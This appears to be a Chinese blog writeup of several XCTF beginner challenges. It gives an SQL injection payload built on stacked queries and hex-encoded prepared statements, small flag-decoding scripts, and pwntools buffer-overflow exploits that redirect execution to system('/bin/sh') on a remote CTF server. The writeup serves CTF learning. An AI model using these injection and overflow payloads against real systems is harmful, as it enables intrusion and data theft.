攻防世界之我是菜鸡
date
Aug 5, 2021 12:17 PM
Related to 日程数据 1 (blog)
tags
Writeup
slug
web2
summary
go on
0x0e supersqli



因为select被过滤了,所以先将select * from 1919810931114514
进行16进制编码
再通过构造payload得
;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
进而得到flag
prepare…from…是预处理语句,会进行编码转换。
execute用来执行由SQLPrepare创建的SQL语句。
SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值。
open-source
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[]) {
if (argc != 4) {
printf("what?\n");
exit(1);
}
unsigned int first = atoi(argv[1]);
if (first != 0xcafe) {
printf("you are wrong, sorry.\n");
exit(2);
}
unsigned int second = atoi(argv[2]);
if (second % 5 == 3 || second % 17 != 8) {
printf("ha, you won't get it!\n");
exit(3);
}
if (strcmp("h4cky0u", argv[3])) {
printf("so close, dude!\n");
exit(4);
}
printf("Brr wrrr grr\n");
unsigned int hash = first * 31337 + (second % 17) * 11 + strlen(argv[3]) - 1615810207;
printf("Get your key: ");
printf("%x\n", hash);
return 0;
}
atoi (表示ascii to integer)
./string 51966 25 h4cky0u
或者 去判断
#include <stdio.h>
#include <string.h>
int main() {
unsigned int hash = 0xcafe * 31337 + 8 * 11 + strlen("h4cky0u") - 1615810207;
printf("Get your key: ");
printf("%x\n", hash);
return 0;
}

hello ctf


simple-unpack


这是有壳啊




logmein




适量N

var28="harambe"
var20=":\"AL_RT^L*.?+6/46"
flag=""
for i in range(len(var20)):
f = ord(var20[i]) ^ ord(var28[i%7])
flag +=chr(f)
print(flag)

no-strings-attached


X追踪一下


要解密


buf =[
0x3a,0x14,0x00,0x00,0x36,0x14,0x00,0x00,0x37,0x14,0x00,0x00,0x3b,0x14,0x00,
0x00,0x80,0x14,0x00,0x00,0x7a,0x14,0x00,0x00,0x71,0x14,
0x00,0x00,0x78,0x14,0x00,0x00,0x63,0x14,0x00,0x00,0x66,
0x14,0x00,0x00,0x73,0x14,0x00,0x00,0x67,0x14,0x00,0x00,
0x62,0x14,0x00,0x00,0x65,0x14,0x00,0x00,0x73,0x14,0x00,
0x00,0x60,0x14,0x00,0x00,0x6b,0x14,0x00,0x00,0x71,0x14,
0x00,0x00,0x78,0x14,0x00,0x00,0x6a,0x14,0x00,0x00,0x73,
0x14,0x00,0x00,0x70,0x14,0x00,0x00,0x64,0x14,0x00,0x00,
0x78,0x14,0x00,0x00,0x6e,0x14,0x00,0x00,0x70,0x14,0x00,
0x00,0x70,0x14,0x00,0x00,0x64,0x14,0x00,0x00,0x70,0x14,
0x00,0x00,0x64,0x14,0x00,0x00,0x6e,0x14,0x00,0x00,0x7b,
0x14,0x00,0x00,0x76,0x14,0x00,0x00,0x78,0x14,0x00,0x00,
0x6a,0x14,0x00,0x00,0x73,0x14,0x00,0x00,0x7b,0x14,0x00,
0x00,0x80,0x14,0x00,0x00]
f=[]
for i in range(0,len(buf),4):
f.append(buf[i])
print(f)
fl=""
nu=[1,2,3,4,5]
for j in range(len(f)):
fl += chr(f[j]-nu[j%5])
print(fl)
getit


s = 'c61b68366edeb7bdce3c6820314b7498'
flag = ''
for i in range(len(s)):
if i & 1:
t = 1
else:
t = -1
flag += chr(ord(s[i]) + t)
print (flag)
#得出结果: b70c59275fcfa8aebf2d5911223c6589
csaw2013reversing2


打开是必须勾选以写入模式加载





参考
EasyRE
看见奇怪的东西

是个幌子

逆向算法
翻车
level0

没啥东西

有提示 点进去

可以输入0x200的东西 but *buf的长度为0x80

from pwn import *
r = remote("111.200.241.244",58379) # 服务器
payload = b'A' * 0x80 + b'a' * 0x8 + p64(0x00400596) #0x80的大小加leave的0x8 改写ret为callsystem的头
r.recvuntil("Hello, World\n") #等待指定字符 p.recv() #接收输出
r.sendline(payload) #发送payload
r.interactive() #交互

level2

漏洞函数在前


0x88 可被0x100覆盖溢出
找想要跳的add system 函数
0x08048320

需要system('/bin/shell') 找到字符
0x0804a024

构建pyalod

payload=b'a'*(0x88+0x4)+p32(
0x08048320
)+p32(0)+p32(0x0804a024
)
from pwn import *
p = remote('111.200.241.244', 60256)
#payload = b'a' * (0x88 + 0x4) + p32(0x0804845c) + p32(0x0804A024) #call system的地址
payload=b'a'*(0x88+0x4)+p32(0x08048320)+p32(0)+p32(0x0804a024)
#p.recvuntil("Input:\n")
p.recv()
p.sendline(payload)
p.interactive()
两种方式都可以